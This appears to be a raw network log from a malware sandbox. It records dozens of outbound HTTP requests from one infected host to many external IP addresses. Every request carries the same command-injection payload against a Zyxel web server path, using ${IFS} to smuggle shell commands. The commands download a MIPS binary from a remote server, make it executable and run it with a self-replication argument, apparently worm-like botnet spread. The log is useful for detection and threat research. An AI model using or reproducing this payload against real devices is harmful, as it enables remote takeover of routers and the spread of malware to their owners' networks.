                                          Jan 14, 2024 15:46:02.729388952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          998192.168.2.235294412.138.143.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729419947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          999192.168.2.2336630131.135.158.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729454041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1000192.168.2.2347966142.192.199.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729468107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1001192.168.2.2332802142.115.167.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729496002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1002192.168.2.2334284202.86.251.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729497910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1003192.168.2.2357270223.184.73.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729540110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1004192.168.2.2333978181.20.187.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729541063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1005192.168.2.2360046171.29.197.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729604959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1006192.168.2.2346888143.72.217.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729604959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1007192.168.2.233410238.97.198.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729636908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1008192.168.2.233902051.136.105.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729666948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1009192.168.2.2360910202.218.59.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729686022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1010192.168.2.235561675.23.0.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729713917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1011192.168.2.234685246.199.177.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729744911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1012192.168.2.2357764173.239.229.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729762077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1013192.168.2.2337912128.92.47.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729796886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1014192.168.2.2341920139.166.180.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729799032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1015192.168.2.2339170189.39.97.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729815960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1016192.168.2.234725278.99.234.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729856968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1017192.168.2.2341890185.125.146.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729914904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1018192.168.2.2344890139.45.245.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729918003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1019192.168.2.2359014199.185.165.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729964972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1020192.168.2.233905649.157.115.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729994059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1021192.168.2.235116491.149.99.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729996920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1022192.168.2.2347494173.227.123.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729998112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1023192.168.2.2352804158.210.154.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730057001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1024192.168.2.2337020217.140.25.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730081081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1025192.168.2.233796213.130.254.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730107069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1026192.168.2.235352827.82.207.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730158091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1027192.168.2.2337820124.9.237.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730175972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1028192.168.2.2335136165.103.184.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730191946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1029192.168.2.235256073.176.211.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730216980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1030192.168.2.234314850.160.247.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730232954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1031192.168.2.2336028137.235.9.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730257034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1032192.168.2.23468725.136.211.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730305910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1033192.168.2.2348164192.75.78.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730321884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1034192.168.2.2337632187.91.79.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730343103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1035192.168.2.2341142190.232.131.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730370045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1036192.168.2.235550097.218.104.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730392933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1037192.168.2.234763613.152.84.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730416059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1038192.168.2.2338598150.64.108.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730416059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1039192.168.2.2351446182.167.163.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730429888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1040192.168.2.2348184162.224.107.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730453014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1041192.168.2.235398638.88.214.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730504036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1042192.168.2.2333840142.152.30.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730546951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1043192.168.2.2342848130.200.173.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730556011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1044192.168.2.2359762217.168.205.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730598927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1045192.168.2.2346624186.118.100.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730623007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1046192.168.2.2358480136.210.131.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730703115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1047192.168.2.235875478.100.30.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730701923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1048192.168.2.235373812.199.242.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730701923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1049192.168.2.2351956223.66.5.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730735064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1050192.168.2.233888613.44.176.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730789900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1051192.168.2.2333036203.113.233.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730829000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1052192.168.2.2352796192.88.222.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730869055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1053192.168.2.234059662.192.80.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730870008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1054192.168.2.2335812125.198.39.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730890036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1055192.168.2.233404413.87.201.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730895042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1056192.168.2.2337888134.40.156.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730978966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1057192.168.2.234689678.176.148.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.730978966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1058192.168.2.2355532168.58.224.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731012106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1059192.168.2.2347418142.73.168.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731043100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1060192.168.2.23454048.228.241.80443
                                          TimestampBytes transferredDirectionData
